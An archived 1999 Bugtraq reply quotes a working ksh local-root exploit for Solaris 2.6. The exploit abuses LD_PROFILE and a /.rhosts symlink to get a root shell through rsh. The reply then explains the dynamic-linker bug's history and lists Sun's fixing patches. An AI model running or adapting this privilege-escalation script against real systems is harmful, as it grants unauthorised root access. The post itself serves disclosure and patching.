Bugtraq mailing list archives
Re: LD_PROFILE local root exploit for solaris 2.6
From: casper () HOLLAND SUN COM (Casper Dik)
Date: Fri, 24 Sep 1999 10:30:32 +0200
works on solaris 2.6 sparc anyway... #! /bin/ksh # LD_PROFILE local root exploit for solaris # steve () tightrope demon co uk 19990922 umask 000 ln -s /.rhosts /var/tmp/ps.profile export LD_PROFILE=/usr/bin/ps /usr/bin/ps echo + + > /.rhosts rsh -l root localhost csh -i
This is bug 4150646 (or rather, 1241843, which resurfaced after an extensive rewrite of the dynamic linker) It's been fixed in Solaris 7 and with the following patches in other releases: 103242-07: SunOS 5.5: linker patch 103243-07: SunOS 5.5_x86: linker patch 103627-11: SunOS 5.5.1: Linker patch 103628-10: SunOS 5.5.1_x86: Linker patch 105490-07: SunOS 5.6: linker patch 105491-05: SunOS 5.6_x86: linker patch The bug was originally fixed in 5.5.1 and back patched; I rediscovered that it was back in 2.6 (which also meant it was in the process of being patched back into 5.5/5.5.1, but I think those patches were held up until the regression was fixed); this was all well before S7 was released. The original bug was also fixed in the following patches: 102049-05: SunOS 5.4: linker fixes 102303-05: SunOS 5.4: POINT PATCH: linker fixes 102304-05: SunOS 5.4_x86: POINT PATCH: linker fixes 102778-03: SunOS 5.4_x86: linker patch Casper
Current thread:
- BT/Cellnet Genie vulnerability James Fidell (Sep 15)
- Re: BT/Cellnet Genie vulnerability James Fidell (Sep 15)
- Vulnerability in dtaction on Digital Unix Zack Hubert (Sep 16)
- Re: Vulnerability in dtaction on Digital Unix Eric Gatenby (Sep 16)
- Nmap and Cisco Dos, clarification -- Lancashire, Andrew (Sep 22)
- Re: Nmap and Cisco Dos, clarification -- Darren Reed (Sep 23)
- LD_PROFILE local root exploit for solaris 2.6 Steve Mynott (Sep 22)
- Re: LD_PROFILE local root exploit for solaris 2.6 Brock Sides (Sep 23)
- Re: LD_PROFILE local root exploit for solaris 2.6 Erik Fichtner (Sep 23)
- Announcing Second Annual TooRcon Computer Security Expo Ben (Sep 25)
- Re: Vulnerability in dtaction on Digital Unix Eric Gatenby (Sep 16)
- Re: LD_PROFILE local root exploit for solaris 2.6 Casper Dik (Sep 24)
- Re: LD_PROFILE local root exploit for solaris 2.6 Eric Daniel (Sep 28)
- Re: LD_PROFILE local root exploit for solaris 2.6 Pavel Kankovsky (Sep 24)
- Re: Vulnerability in dtaction on Digital Unix Dave Dittrich (Sep 22)
- Re: ASUS mother board security question... Alan Cox (Sep 16)
- Re: ASUS mother board security question... Nick FitzGerald (Sep 25)